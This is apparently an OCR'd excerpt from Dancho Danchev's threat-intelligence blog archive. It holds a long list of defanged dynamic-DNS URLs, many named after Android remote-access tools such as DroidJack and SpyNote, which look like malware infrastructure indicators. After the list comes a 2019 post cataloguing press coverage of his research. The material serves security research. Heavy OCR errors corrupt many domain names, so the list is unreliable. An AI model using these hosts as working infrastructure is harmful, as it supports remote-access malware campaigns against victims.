hxxp://arondog rau.ddns.net/ 
hxxp://asasasas2 2.ddns.net/ 
hxxp://asd bhll.ddns.net/ 
hxxp://aski nder.hopto.org/ 
hxxp://astro3.hopto.org/ 
hxxp://atsizi nog I u.duckdns.org/ 
hxxp://auc.dl inkddns.com/ 
h xx p://a wir-fb.sytes.net/ 
hxxp://axxz2017. ddns.net/ 
hxxp://ayadd99. ddns.net/ 
hxxp://ay hamll.hopto.org/ 
hxxp://azerboys.hopto.org/ 
hxxp://azertl 2 3.ddns.net/ 
hxxp://azerty. hopto.org/ 
hxxp://aziza. sytes.net/ 
hxxp://baby.webhop.me/ 
hxxp://badguy.myq-see.com/ 
hxxp://bahar2017.no-ip.org/ 
hxxp://bahoom. no-ip. biz/ 



hxxp://banis. hopto.org/ 
hxxp://ban nding.ddns.net/ 
hxxp://bapforal Lddns.net/ 
hxxp://barbari. ddns.net/ 
hxxp://batterysaver. 3utilities.com/ 
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hxxp://beh namhack.ddns.net/ 
hxxp://beijg.3322.org/ 
hxxp://bensphonetracker.ddns.net/ 
hxxp://bitoandroid. no-ip. info/ 
hxxp://bl4ckhOt.ddns.net/ 
hxxp://bl4ckhatj oker.ddns.net/ 
hxxp://blackl 990.ddns.net/ 
hxxp://blackg hostdc.duckdns.org/ 
hxxp://blackg hostorg.ddns.net/ 
hxxp://bl indl234.ddns.net/ 
hxxp://boinserverl 2. no-ip. info/ 
hxxp://bopress.ddns.net/ 
hxxp://bou bou271.ddns.net/ 
hxxp://brasi lteamop.ddns.net/ 



hxxp://broussel6.ddns.net/ 
hxxp://bwaleez.hopto.org/ 
hxxp://ca mper92.ddns.net/ 
hxxp://carapuce-2015.no-ip.biz/ 
hxxp://cccamd.myftp.biz/ 
hxxp://cerdofi le.ddns.net/ 
hxxp://chabar.ddns.net/ 
hxxp://chacalOO.hopto.org/ 
hxxp://changyu 2 31.ddns.net/ 
hxxp://chrisfo. no-ip.org/ 
hxxp://city55. hopto.org/ 
hxxp://cj bksOuO.no-ip.org/ 
hxxp://clashdroid.no-ip.biz/ 
hxxp://clayhost. hopto.org/ 
hxxp://comet. myftp.org/ 
hxxp://comsurogate.noip.me/ 
hxxp://coxiami go. myq-see.com/ 
hxxp://createmeon.zapto.org/ 
hxxp://cricbot. no-ip. info/ 
hxxp://crisprueba.ddns.net/ 



hxxp://cyberandro.duckdns.org/ 
hxxp://cy berbit.ddns.net/ 
hxxp://cybercrysis.ddns.net/ 
hxxp://dal ibobl2.ddns.net/ 
hxxp://damndamn.ddns.net/ 
hxxp://dangerlove. no-ip. biz/ 
hxxp://dan ialdelta.ddns.net/ 
hxxp://danialmostafaei.no-ip.biz/ 
hxxp://dan iele3814.ddns.net/ 
hxxp://dan ielrats.ddns.net/ 
hxxp://dantehack.zapto.org/ 
hxxp://daroedkak.no-ip.biz/ 
hxxp://darweshfis. no-ip.org/ 
hxxp://datadown loader.ddns.net/ 
hxxp://dddeee.ddns.net/ 
hxxp://ddns.net/ 

1003 

hxxp://deepl234.ddns.net/ 
hxxp://del learm.ddns.net/ 
hxxp://dendroid. hopto.org/ 



hxxp://denishu Lhldns.ru/ 
hxxp://detlef-gmbh.tk/ 
hxxp://dexon ic.duckdns.org/ 
hxxp://d iceedicee.ddns.net/ 
hxxp://d idi03.duckdns.org/ 
hxxp://d ion is.ddns.net/ 
hxxp://djackl. zapto.org/ 
hxxp://d kms.ddns.net/ 
hxxp://d ltelegram.ddns.net/ 
hxxp://dodotototata. publicvm.com/ 
hxxp://dogecoi nspeed.zapto.org/ 
hxxp://domeer-and roid.ddns.net/ 
hxxp://domi ra.ddns.net/ 
hxxp://d raagon.ddns.net/ 
hxxp://d ragonhkrl.myftp.biz/ 
hxxp://drhack. hopto.org/ 
hxxp://driodrac.ddns.net/ 
hxxp://d raid.fagdns.com/ 
hxxp://d raid.freedynamicdns.org/ 
hxxp://d roidcraftismelmao.ddns.net/ 



hxxp://d roidge.ddns.net/ 
hxxp://d roidhost.zapto.org/ 
hxxp://d roidjaack.zapto.org/ 
hxxp://d roidjack.hopto.org/ 
h xx p: //d ro i d j a c k 1. sy tes. n et/ 
hxxp://d roidjackl21.ddns.net/ 
hxxp://d roidjack2137.hopto.org/ 
hxxp://d roidjack228.ddns.net/ 
hxxp://d roidjack2333.ddns.net/ 
hxxp://d roidjack258.bounceme.net/ 
hxxp://d roidjackdns.duckdns.org/ 
hxxp://d roidjackiam.ddnsking.com/ 
hxxp://d roidjackisgodly.ddns.net/ 
hxxp://d roidjackkk.sytes.net/ 
hxxp://d roidjackv5.ddns.net/ 
hxxp://droidjock.myftp.biz/ 
hxxp://d raid mosa.ddns.net/ 
hxxp://d roidnigga.zapto.org/ 
hxxp://d roidspy.zapto.org/ 
hxxp://droidss.noip.me/ 



hxxp://d roy.zapto.org/ 
hxxp://drrazi khan, no-ip. info/ 
hxxp://d uckem.duckdns.org/ 
hxxp://d ucmanhhoangtran.ddns.net/ 
hxxp://du ke5010.duckdns.org/ 
hxxp://duyguseliberkay.no-ip.biz/ 
hxxp://dzhackerl 6.ddns.net/ 
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hxxp://e777 kx47.ddns.net/ 
hxxp://egytiger. myftp.org/ 
hxxp://ehsan maali.ddns.net/ 
hxxp://ehsan maali3.ddns.net/ 
hxxp://eldiablo.no-ip.biz/ 
hxxp://elisou 19.ddns.net/ 
hxxp://emme. no-ip. biz/ 
hxxp://eng nngns.duckdns.org/ 
hxxp://engrid. no-ip.biz/ 
hxxp://equ isde.ddns.net/ 
hxxp://eri katersptra.ddns.net/ 
hxxp://esharj.ddns.net/ 



hxxp://eslam87. hopto.org/ 
hxxp://essalh i2047.hopto.org/ 
hxxp://euquerotchu.ddns.net/ 
hxxp://explosif.zapto.org/ 
hxxp://extgta.tk/ 

hxxp://facebook2 ww290.ddns.net/ 

hxxp://facrbook. red irectme.net/ 

hxxp://fad isesubaih.ddns.net/ 

hxxp://farzan.ddns.net/ 

hxxp://fateh2017.ddns.net/ 

hxxp://fati43030. no-ip.biz/ 

hxxp://fati ha29.ddns.net/ 

hxxp://fenon 158. ddns.net/ 

hxxp://ferzol881.duckdns.org/ 

hxxp ://fifi 147fifi.no-ip.biz/ 

hxxp://fi renzonne.com/ 

hxxp://fi rsthost.ddns.net/ 

hxxp ://fl ash pi ayerxx.no-ip.org/ 

hxxp ://fl orian-pc.ksueyuj0mtxpt6gn.myfritz.net/ 

hxxp ://freel. neiwangtong.com/ 



hxxp://freepalesti ne.ddns.net/ 
hxxp://fsocfsoc. ddns.net/ 
hxxp://fu keyoul2.myftp.biz/ 
hxxp://gaabar. hopto.org/ 
hxxp://galau.ddns.net/ 
hxxp://g emini85.hopto.org/ 
hxxp://gentel901. no-ip.org/ 
hxxp://geocheats2.eu/ 
hxxp://g ert44.duckdns.org/ 
hxxp://g gwasgeht.ddns.net/ 
hxxp://g hanim2017.ddns.net/ 
hxxp://ghanou 1603. no-ip. info/ 
hxxp://g mailssll.hopto.org/ 
hxxp://goggle.sytes.net/ 
hxxp://gold5000.ddns.net/ 
hxxp://gooboom.no-ip. biz/ 
hxxp://good.myddns.me/ 
hxxp://goog2. no-ip. biz/ 
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hxxp://g ooglead.publicvm.com/ 



hxxp://googles. servemp3.com/ 
hxxp://googleweb.ddns.net/ 
hxxp://gooogleplay.dd ns.net/ 
hxxp://gorr. hopto.org/ 
hxxp://goshasb. ddns.net/ 
hxxp://g randeamore.ddns.net/ 
hxxp ://g reat-su pport.com/ 
hxxp://g reatkeyboard.hopto.org/ 
hxxp ://g ruposoluciomatica.com.br/ 
hxxp ://gta5 hacking 12.duckdns.org/ 
hxxp://g usuil.ddns.net/ 
hxxp ://haa7aah. no-ip. biz/ 
hxxp://habbo. no-ip.org/ 
hxxp ://habi bl376.ddns.net/ 
hxxp://habi b556.ddns.net/ 
hxxp://hacl23k. hopto.org/ 
hxxp ://hachim07reg. no-ip. info/ 
hxxp://hackllll.noip.me/ 
hxxp ://hackl 55. vicp.net/ 
hxxp://hacked2001. hopto.org/ 



hxxp://hacker-81. no-ip. biz/ 
hxxp://hacker2. hopto.org/ 
hxxp://hacker421. hopto.org/ 
hxxp://hackermoqtada. no-ip. biz/ 
hxxp://hackertnl23.no-ip.biz/ 
hxxp://hackhack2016. no-ip. info/ 
hxxp://hackhamer.za pto.org/ 
hxxp://hacki nroll.ddns.net/ 
hxxp://hackme. no-ip.org/ 
hxxp://hacksd 20.ddns.net/ 
hxxp://hacksyria2.myftp.biz/ 
hxxp://hadsu rvey.ddns.net/ 
hxxp ://hahalol.ddns.net/ 
hxxp://hahalol. no-ip. biz/ 
hxxp ://haiderhacerl 2. no-ip. biz/ 
hxxp://hajeeeee.hopto.org/ 
hxxp://hakedpcOOOO.myftp.biz/ 
hxxp ://hakeeral i2.ddns.net/ 
hxxp://haker-2119.ddns.net/ 
hxxp ://hakerl 0.ddns.net/ 



hxxp://hakosi ken.duckdns.org/ 
hxxp://haku namatata007.ddns.net/ 
hxxp ://hala2 2 2. hopto.org/ 
hxxp://halol 2.duckdns.org/ 
hxxp ://hami dosl342.ddns.net/ 
hxxp://hamker.ddns.net/ 
hxxp://hamo55.hopto.org/ 
hxxp ://hamza 19991. hopto.org/ 
hxxp ://hamzaelcb.ddns.net/ 
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hxxp ://hananox.ddns.net/ 
hxxp ://hard sty leraver.no-ip.org/ 
hxxp://harounel2.myddns.me/ 
hxxp://hasha.hopto.org/ 
hxxp ://hasn9999. ddns.net/ 
hxxp ://hassan 100.ddns.net/ 
hxxp ://hassanabd 12 33.ddns.net/ 
hxxp ://hatam. no-ip.org/ 
hxxp ://havij.ddns.net/ 
hxxp://haxor. hopto.org/ 



hxxp://haxorj ib.no-ip.org/ 

hxxp://hazeml23.no-ip.biz/ 

hxxp://hazhar77. no-ip. biz/ 

hxxp://hed r78.ddns.net/ 

hxxp://heemoana. hopto.org/ 

hxxp://hegazy5753.ddns.net/ 

hxxp://hehe.duckdns.org/ 

hxxp://hei kechenmo.3322.org/ 

hxxp://hei I bronn.duckdns.org/ 

hxxp://hel 12066.zapto.org/ 

hxxp://hel loandroid.no-ip.org/ 

hxxp://hero400.ddns.net/ 

hxxp://h hhhhfhf.ddns.net/ 

hxxp://h mtl985.ddns.net/ 

hxxp://hobi. 3utilities.com/ 

hxxp://hohol 21292.ddns.net/ 

hxxp://hoho39.ddnc.net/ 

hxxp://hohoang pmy.ddns.net/ 

hxxp://hooman8219.servecounterstrike.com/ 

hxxp://hopto.org/ 



hxxp://hoseenoori 2 2 77 kh.ddns.net/ 
hxxp ://hossam3030. ddns.net/ 
hxxp://hossar.ddns.net/ 
hxxp://hosteng 123.hopto.org/ 
hxxp ://hosthack2 5.ddns.net/ 
hxxp ://houari bey4.ddns.net/ 
hxxp://houari bey4.no-ip.org/ 
hxxp://houssmes.zapto.org/ 
hxxp ://hqn.ddns.net/ 
hxxp ://htmp. sytes.net/ 
hxxp ://h uhuhuya.ddns.net/ 
hxxp://hussein 1889. no-ip. biz/ 
hxxp://husshacka. hopto.org/ 
hxxp://i 1993.ddns.net/ 
hxxp://i mad2001bo.hopto.org/ 
hxxp ://i ndusvOO.duckdns.org/ 
hxxp ://i nfo.bounceme.net/ 
hxxp ://i njectman.ddns.net/ 
hxxp ://i nsegnando.net/ 
hxxp ://i nteljet.ddns.net/ 
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hxxp ://i ntelresol.ddns.net/ 
hxxp://i pv445.hopto.org/ 
hxxp://iqram85spy.ddns.net/ 
hxxp ://i ran0513.ddns.net/ 
hxxp ://i rcvenezia.it/ 
hxxp ://isamdon ita.no-ip.org/ 
hxxp://islam2020libya.no-ip.biz/ 
hxxp ://izmi rsatranckursu.net/ 
hxxp://jackdroid.systes.net/ 
hxxp ://j ackdroidl337.ddns.net/ 
hxxp ://j afarman.ddns.net/ 
hxxp://jalal 12 3.hopto.org/ 
hxxp://jas7ser. hopto.org/ 
hxxp://jassair.hopto.org/ 
hxxp ://j brianwashman.com/ 
hxxp ://j irawat01.ddns.net/ 
hxxp://j kgytgasjgl2.serveftp.com/ 
hxxp ://j nkey.ddns.net/ 
hxxp ://j ockerhackerxnxx.ddns.net/ 



hxxp ://j oh nharim004.ddns.net/ 
hxxp://jojomo.ddns.net/ 
hxxp://jomo.zapto.org/ 
hxxp://josewaldo.ddns.net/ 
hxxp ://j uanblackhak.ddns.net/ 
hxxp://j uliocoelhodesa.hopto.org/ 
hxxp://j un.dynu.com/ 
hxxp://justarat.noip.me/ 
hxxp ://kOkOwa wa.hopto.org/ 
hxxp ://kaedalsh.ddns.net/ 
hxxp ://ka izenOO.ddns.net/ 
hxxp ://ka kashi.ddns.net/ 
hxxp ://ka I iheh. no-ip. biz/ 
hxxp ://ka I inus.ddns.net/ 
hxxp ://ka I ljo.dvrdns.org/ 
hxxp ://ka rarkarar0780.ddns.net/ 
hxxp ://ka renchikl9.hopto.org/ 
hxxp ://ka rrarhuseein82.ddns.net/ 
hxxp ://kaskw.myftp. biz/ 
hxxp://kaskw.zapto.org/ 



hxxp://kasofel23123aa.no-ip.biz/ 
hxxp://kasper.ddns.net/ 
hxxp://keskes0212 2002.ddns.net/ 
hxxp://kevte2 6.zapto.org/ 
hxxp://khaleelO.zapto.org/ 
hxxp://khalid-2016.noip.me/ 
hxxp://khantac.ddns.net/ 
hxxp://kherid I a. hopto.org/ 
hxxp://kingdom. no-ip. biz/ 
hxxp://ki nggg.ddns.net/ 
hxxp://kj gjgkhffh.sytes.net/ 
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hxxp://kka 163.ddns.net/ 
hxxp://kkarox90. no-ip.org/ 
hxxp://kmessi.myddns.me/ 
hxxp://korelev. no-ip.org/ 
hxxp://kreml ll.ddns.net/ 
hxxp://krlol.ddns.net/ 
hxxp://ksbozo.ddns.net/ 
hxxp://kskdt.ddns.net/ 



hxxp://ku raist.zapto.org/ 
hxxp://kusleratnt.duckdns.org/ 
hxxp://l ahyarhmo.hopto.org/ 
hxxp://l amorash.ddns.net/ 
hxxp://laze22.hopto.org/ 
hxxp://learnxea. duckdns.org/ 
hxxp://led5526. ddns.net/ 
hxxp://likerrdd.myftp.biz/ 
hxxp://l inonymousami.no-ip.org/ 
hxxp://l izdlezozifpo.ddns.net/ 
hxxp://local 12 32.ddns.net/ 
hxxp://locolocoloco.ddns.net/ 
hxxp://lol man.ddns.net/ 
hxxp://lordxxx. myq-see.com/ 
hxxp://love2014. ddns.net/ 
hxxp://loveu baby. 3utilities.com/ 
hxxp://l putyr.myq-see.com/ 
hxxp://l uxuriaecu.ddns.net/ 
hxxp://mad blackO.sytes.net/ 
hxxp://madov-matrix2 5. no-ip.org/ 



hxxp://mageman koktelam.ddns.net/ 
hxxp://mahd il379.ddns.net/ 
hxxp://mahd i3141.ddns.net/ 
hxxp://mahd ibabal23.ddns.net/ 
hxxp://majedl 11 lll.myq-see.com/ 
hxxp://maj od98m.ddns.net/ 
hxxp ://makarand. no-ip.org/ 
hxxp://mal akatef09.ddns.net/ 
hxxp ://mamal 9921.ddns.net/ 
hxxp ://mami 52 55.duckdns.org/ 
hxxp ://mar020one. hopto.org/ 
hxxp ://marcsil.ddns.net/ 
hxxp ://marknetz. hopto.org/ 
hxxp ://marocma roc. hopto.org/ 
hxxp://marti nl23456.no-ip.org/ 
hxxp://masafat.ddns.net/ 
hxxp ://maskaral ama.ddns.net/ 
hxxp ://masterat. myftp.org/ 
hxxp ://matg io.duckdns.org/ 
hxxp://matrix-teste.ddns.net/ 



hxxp://mayya ha. no-ip. info/ 
hxxp://mazenttr2. hopto.org/ 
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hxxp://me512.zapto.org/ 
hxxp://medoah med3.ddns.net/ 
hxxp://medx321.ddns.net/ 
hxxp://mee2008.zapto.org/ 
hxxp://mehost.ddns.net/ 
hxxp://mehtabl 2 3.ddns.net/ 
hxxp://memeai men 10. hopto.org/ 
hxxp://memexmama.ddns.net/ 
hxxp://mhoa mmedtty.hopto.org/ 
hxxp://mht3.ddns.net/ 
hxxp://microsoft-office.ddns.net/ 
hxxp://mido28. hopto.org/ 
hxxp://migo2018.zapto.org/ 
hxxp://mi kaniki.ddns.net/ 
hxxp://mikestar. no-ip. biz/ 
hxxp://mi ltin2.no-ip.org/ 
hxxp://mi nou555.hopto.org/ 



hxxp://misterx94.ddns.net/ 
hxxp://misty2 55. no-ip.org/ 
hxxp://mixtape2016. ddns.net/ 
hxxp://mmdjj212.myftp.biz/ 
hxxp://mobd ro.hopto.org/ 
hxxp://mobi Ies0ft.no-ip.org/ 
hxxp://moga hed.ddns.net/ 
hxxp://moha medll.ddns.net/ 
hxxp://moha med4dz.ddns.net/ 
hxxp://moha medamine.ddns.net/ 
hxxp://moha medhg.no-ip.org/ 
hxxp://mohamednj rati 11. no-ip. biz/ 
hxxp://mohammad 2002. no-ip. biz/ 
hxxp://moha mmadhk.ddns.net/ 
hxxp://mohammed 2 2468. no-ip. biz/ 
hxxp://moha mmed93mahdi.ddns.net/ 
hxxp://mohfort.ddns.net/ 
hxxp://mohmad.myftp.biz/ 
hxxp://moh mdnor.ddns.net/ 
hxxp://mohsanal i79355.ddns.net/ 



hxxp://mohsenfaz.ddns.net/ 
hxxp://moj il936.ddns.net/ 
hxxp://mokhter2 2 2 029.ddns.net/ 
hxxp://moktarpicaasri nabil.zapto.org/ 
hxxp://momen-swesi. no-ip. biz/ 
hxxp://momo2015.duckdns.org/ 
hxxp://mon itoring007.zapto.org/ 
hxxp://moonmarlO. no-ip. biz/ 
hxxp://moosio. no-ip. biz/ 
hxxp://mosey book.com/ 
hxxp://mosli rn.ddns.net/ 
hxxp://mostafaafrotoO.ddns.net/ 
hxxp://motoshi.zapto.org/ 
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hxxp://mphp.hopto.org/ 
hxxp://mrbl acklife.ddns.net/ 
hxxp://mrclone97.ddns.net/ 
hxxp://mrg net.ddns.net/ 
hxxp://mrkri per3331.zapto.org/ 
hxxp://mrm2.ddns.net/ 



hxxp://mrreda98. ddns.net/ 
hxxp://msficecream. ddns.net/ 
hxxp://msn-web.ddnsking.com/ 
hxxp://msn79.ddns.net/ 
hxxp://mstar.ddns.net/ 
hxxp://mstfa 10.ddns.net/ 
hxxp://mu rryapplicazione.no-ip.org/ 
hxxp://muxa mi lu.hopto.org/ 
hxxp://mwanika. no-ip. biz/ 
hxxp://myaw. no-ip. biz/ 
hxxp://myfreerat.ddns.net/ 
hxxp://myfren id 2x.zapto.org/ 
hxxp://myhostl23.myftp.biz/ 
hxxp://myi 11 usion02.hopto.org/ 
hxxp://myon line, no-ip. biz/ 
hxxp://mypy23.ddns.net/ 
hxxp://nad ineemma.servegame.com/ 
hxxp://nama ndroidk63.zapto.org/ 
hxxp ://napaixonado.ddns.net/ 
hxxp://nassahsl iman.ddns.net/ 



hxxp://nemesi s2017.zapto.org/ 
hxxp://netfl ix-ip.hopto.org/ 
hxxp://new77 7.ddns.net/ 
hxxp://newword. serveblog.net/ 
hxxp://newxor2. no-ip.org/ 
hxxp://n injabird29.myvnc.com/ 
hxxp://n irajpawarl997.ddns.net/ 
hxxp://njesra.ddns.net/ 
hxxp://nododg.ddns.net/ 
hxxp://nohacker.ddns.net/ 
hxxp://noi phackk.ddns.net/ 
hxxp://noi pjajaja.ddns.net/ 
hxxp://nowg irlas.ddns.net/ 
hxxp://noxrr.ddns.net/ 
hxxp://nu I ldoesnotexist.duckdns.org/ 
hxxp://oday 1995. zapto.org/ 
hxxp://oko.gotdns.ch/ 
hxxp://omar. no-ip. biz/ 
hxxp://oneriakosa.ddns.net/ 
hxxp://opt9 l.ddns.net/ 



hxxp://ori hacker.ddns.net/ 
hxxp://osa marizk.ddns.net/ 
hxxp://osmsalem.ddns.net/ 
hxxp://ospr.pu blicvm.com/ 
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hxxp://oussama 1997.ddns.net/ 
hxxp://oussamadj 1997.ddns.net/ 
hxxp://ovi rus.ddns.net/ 
hxxp://owsen.ddns.net/ 
hxxp://paaradowx. hopto.org/ 
hxxp://parrot01.hopto.org/ 
hxxp://pars.ddns.net/ 
hxxp://persir. no-ip. biz/ 
hxxp://phantom94.ddns.net/ 
hxxp://photofix. hopto.org/ 
hxxp ://pianoti Ies2.ddns.net/ 
hxxp://pi mpdaddy.myq-see.com/ 
hxxp://pippo86. no-ip. biz/ 
hxxp ://portmei rn.ddns.net/ 
hxxp ://ppl web. pplmotorhomes.com/ 



hxxp://premi um007.zapto.org/ 
hxxp://priyaku mari.ddns.net/ 
hxxp://profmi lf.zapto.org/ 
hxxp://prohacker.freedy namicdns.org/ 
hxxp://projectp.ddns.net/ 
hxxp://pruebasernesto.ddns.net/ 
hxxp://q wertyl212.ddns.net/ 
hxxp://rOOt.myftp.biz/ 
hxxp://r3cxw.ddns.net/ 
hxxp://r90. no-ip. biz/ 
hxxp://radouan 123.hopto.org/ 
hxxp://rah imtrx.hopto.org/ 
hxxp://ral iphesus.ddns.net/ 
hxxp://rameezmaster.ddns.net/ 
hxxp://rand snaira.dnsdynamic.com/ 
hxxp://rarwindow. no-ip. biz/ 
hxxp://ratfora ndroid.ddns.net/ 
hxxp://rdsl 1.ddns.net/ 
hxxp://redcode.ddns.net/ 
hxxp://reddemon.ddns.net/ 



hxxp://refsa. duckdns.org/ 
hxxp://reich666. ddns.net/ 
hxxp://reich 777.ddns.net/ 
hxxp://remotei p999.ddns.net/ 
hxxp://ri nalditeam.ddns.net/ 
hxxp://rmkl 33. hopto.org/ 
hxxp://rmx2121.ddns.net/ 
hxxp://rockrock.ddns.net/ 
hxxp://rokl3198666. no-ip.biz/ 
hxxp://ron 137 2.ddns.net/ 
hxxp://royalhacker.zapto.org/ 
hxxp://rpshowpick.ddns.net/ 
hxxp://rpswlrkgkarp.p-e.kr/ 
hxxp://rzra51126.ddns.net/ 
hxxp://s.leas.im/ 
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hxxp://s3b4s.noip.me/ 
hxxp://sabbah.duckdns.org/ 
hxxp://sadaq.ddns.net/ 
hxxp://sai ber-far68.ddns.net/ 



hxxp://saighi nissou.ddns.net/ 
hxxp://saj ad ianh.ddns.net/ 
hxxp://sajjadnassar3. no-ip. biz/ 
hxxp://salah067. hopto.org/ 
hxxp://sal arkalat.ddns.net/ 
hxxp://salemaziz. hopto.org/ 
hxxp://samira. no-ip. biz/ 
hxxp://samoomalik. no-ip. biz/ 
hxxp://samuseucu.ddns.net/ 
hxxp ://santamari agorettimestre.it/ 
hxxp://saral9918.ddns.net/ 
hxxp ://sarahwygan. no-ip. biz/ 
hxxp://saraia.ddns.net/ 
hxxp://sarasisi. no-ip.org/ 
hxxp://sasi 546454. hopto.org/ 
hxxp ://saza n765.ddns.net/ 
hxxp ://secu reline2244.ddns.net/ 
hxxp://secu repurpose, no-ip. info/ 
hxxp ://secu ritytests.ddns.net/ 
hxxp ://secu ritytestt.ddns.net/ 



hxxp://sedalbi.com/ 
hxxp://server4u pdate.serveftp.com/ 
hxxp://servi dor23.ddns.net/ 
hxxp://servr. hopto.org/ 
hxxp://sesizkal 32. no-ip. biz/ 
hxxp://seven 1.ddns.net/ 
hxxp://seyf2017.1 in kpc.net/ 
hxxp://shahabhacker.ddns.net/ 
hxxp://shahidsajan. no-ip.biz/ 
hxxp://shara wy74.hopto.org/ 
hxxp://sharmayash. no-ip. biz/ 
hxxp://sherlockhol mes.duckdns.org/ 
hxxp://shgt.tk/ 
hxxp://shoo2018. no-ip.org/ 
hxxp://shosh.ddns.net/ 
hxxp://showj.f3322.net/ 
hxxp://ski nchanger.hopto.org/ 
hxxp://skylexl23.hopto.org/ 
hxxp://sl avikkalinovskiy.ddns.net/ 
hxxp://slayslay.duckdns.org/ 



hxxp://smi ix2012.ddns.net/ 
hxxp://smk22.j kt.net/ 
hxxp://snaider. hopto.org/ 
hxxp://sn iperviruse3.hopto.org/ 
hxxp://sn iperyakub.ddns.net/ 
hxxp://social plus.ddns.net/ 
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hxxp://somenormal guy.duckdns.org/ 
hxxp://sond resl.ddns.net/ 
hxxp://son kar412.duckdns.org/ 
hxxp://sorry.duckdns.org/ 
hxxp://soso.noip.us/ 
hxxp://specre.com/ 
hxxp://spicymemes.d uckdns.org/ 
hxxp://spiel007.ddns.org/ 
hxxp://spofy.ddns.net/ 
hxxp://spynote-web.dynu.com/ 
hxxp://sramic.ddns.net/ 
hxxp://ssjf.myftp.biz/ 
hxxp://stand by 1537.duckdns.org/ 



hxxp://stori ng.hopto.org/ 
hxxp://strateg.ddns.net/ 
hxxp://su perlegitratvirus.ddns.net/ 
hxxp://svn-01.ddns.net/ 
hxxp ://sweetman2020. no-ip. biz/ 
hxxp://system32.com/ 
hxxp://taha 100iq.hopto.org/ 
hxxp ://taherhacker. hopto.org/ 
hxxp ://tak. no-ip. info/ 
hxxp://takpar67.no-ip. biz/ 
hxxp ://tarasl92 8.ddns.net/ 
hxxp://targi01. hopto.org/ 
hxxp://tatacall. servebeer.com/ 
hxxp://tatal ine.hopto.org/ 
hxxp://tedy 1993. ddns.net/ 
hxxp://test.pagez.kr/ 
hxxp ://testl45.ddns.net/ 
hxxp ://test29.ddns.net/ 
hxxp ://testan.ddns.net/ 
hxxp ://testand ro.ddns.net/ 



h xx p://testa pkk. hopto.org/ 
hxxp://testkps.ddns.net/ 
hxxp://testsr.ddns.net/ 
hxxp://testsss. ddns.net/ 
hxxp://testxy.ddns.net/ 
hxxp://theblackl 6.ddns.net/ 
hxxp://thed roidjack.ddns.net/ 
hxxp://thegangsterrap.noip.me/ 
hxxp://theg od2.ddns.net/ 
hxxp://theki I lers.ddns.net/ 
hxxp://themay hen23.no-ip.org/ 
hxxp://tnaxin. msns.cn/ 
hxxp://tomyyk.ddns.net/ 
hxxp://tonyjony.ddns.net/ 
hxxp://topmax. myq-see.com/ 
hxxp://toyman6699. no-ip. info/ 
hxxp://trythel ast.no-ip.org/ 
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hxxp://tu nisvista.3utilities.com/ 
hxxp://u down, ddns.net/ 



hxxp://ufolog lyly.ddns.net/ 
hxxp://u marl4344.ddns.net/ 
hxxp://un known user, no-ip. biz/ 
hxxp://u pdater.myftp.org/ 
hxxp://u pdatesystem.dynu.com/ 
hxxp://u pdatexxx.hopto.org/ 
hxxp://usa.myftp.biz/ 
hxxp://u sa2222.ddns.net/ 
h xx p: //use rframer.sytes.net/ 
hxxp://u serna meg oprol.ddns.net/ 
hxxp://u smh.myq-see.com/ 
hxxp://uzzal 619.viewdns.net/ 
hxxp://vajausi ng.dynu.com/ 
hxxp://vego.ddns.net/ 
hxxp://vetal amatorl.ddns.net/ 
hxxp://viag ra.jumpingcrab.com/ 
hxxp://victi rn.no-ip.org/ 
hxxp://vigo. hopto.org/ 
hxxp://vikas. no-ip. biz/ 
hxxp://vi I levalo.chickenkiller.com/ 



hxxp://vi pcoon.com/ 
hxxp://vipmustafa. no-ip. info/ 
hxxp://vpnO.ddns.net/ 
hxxp://vwelxv.ddns.net/ 
hxxp://w0rm3 2. ddns.net/ 
hxxp://warl 10ck.ddns.net/ 
hxxp://warri rrs.no-ip.org/ 
hxxp://wasawa I id. hopto.org/ 
hxxp://wassamlOO.ddns.net/ 
hxxp://wasxmrtd ub.ddns.net/ 
hxxp://wcvwcv. picp.net/ 
hxxp://webhack2017.ddns.net/ 
hxxp://webi7.ddns.info/ 
hxxp://weedforl ifehacker.ddns.net/ 
hxxp://welcomeheretomept.ddns.net/ 
hxxp://williettinger.cc/ 
hxxp://wi n32.ddns.net/ 
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Historical OSINT - Dancho Danchev's Media and News 
Coverage - 2008-2013 (2019-09-20 17:25) 

Dear blog readers I wanted to take the time and effort and 
summarize all the currently related news media articles 

referencing me and my research throughout the period - 
2008-2013 and wanted to express my gratitude to everyone 

who approached me seeking my assistance in an upcoming 
news article including those who participated in the 

search for me circa 2010 and I wanted to let everyone know 
that users interested in approaching me regarding 





potential news stories including conference presentations 
and possible threat intell requests can approach me at 

disruptive.individuals@gmail.com 

Stay tuned! 

Research and News Articles covering my research 
and referencing me throughout - 2008 : 

• [l]Russian hacker 'militia' mobilizes to attack Georgia 

• [2]Fraudsters Target Facebook With Phishing Scam 

• [3]Fake Microsoft e-mail contains Trojan virus 

• [4]Flackers expand massive IFRAME attack to prime sites 

• [5]Flackers infiltrate Google searches 

• [6]Flackers expand massive IFrame attack to prime sites 
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• [7]Flackers knocked Comcast.net offline 

• [8]Adobe investigates Flash Player attacks 

• [9]High-tech bank robbers phone it in 

• [10]Attackers booby-trap searches at top Web sites 

• [lljCarpet bombing networks in cyberspace 

• [12]Storm worm e-mail says U.S. attacked Iran 

• [13]lndia's underground CAPTCFIA-breaking economy 

• [14]Domain Name Record Altered to Flack Comcast.net 




• [15]Google searchers could end up with a new type of bug 

• [16]Ongoing IFrame attack proving difficult to kill 

• [17]Hackers expand massive IFRAME attack to prime sites 

• [18]Danchev: The small pack Web malware exploitation kit 

• [19]Danchev: Massive SQL injection the Chinese way 

• [20]CAPTCFIAs are dead - new research from Dancho 
Danchev confirms it 

• [21]Flackers infiltrate Google searches 

• [22]Massive faux-CNN spam blitz uses legit sites to deliver 
fake Flash 

• [23]Faked CNN spam blitz pushes fake Flash 

• [24]Danchev: Anti-fraud site DDOS attack 

• [25]Sony PlayStation site victim of SQL-injection attack 

• [26]Fake CNN Alert Still Spreading Malware 

• [27]Look Ma, I'm on CIA.gov 

Research and News Articles covering my research 
and referencing me throughout - 2009: 

• [28]Green Dam exploit in the wild 

• [29]"ln gaz we trust": a fake Russian energy company 
facilitating cybercrime 

• [30]Don't pay your ransom via SMS 

• [31]NYT scareware scam linked to click fraud botnet 




• [32]Danchev: A crimeware developer's to-do list 

• [33]Danchev rained on my scareware campaign 

• [34]ls "aggregate-and-forget" the future of cyber-extortion? 
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• [35]NYT scareware scam linked to click fraud botnet 

• [36]Microsoft declares war on 'scareware' 

• [37]Don't pay your ransom via SMS 

• [38]Twitter warms up malware filter 

• [39]What's really the safest Web Browser? 

• [40]With Unrest in Iran, Cyber-attacks Begin 

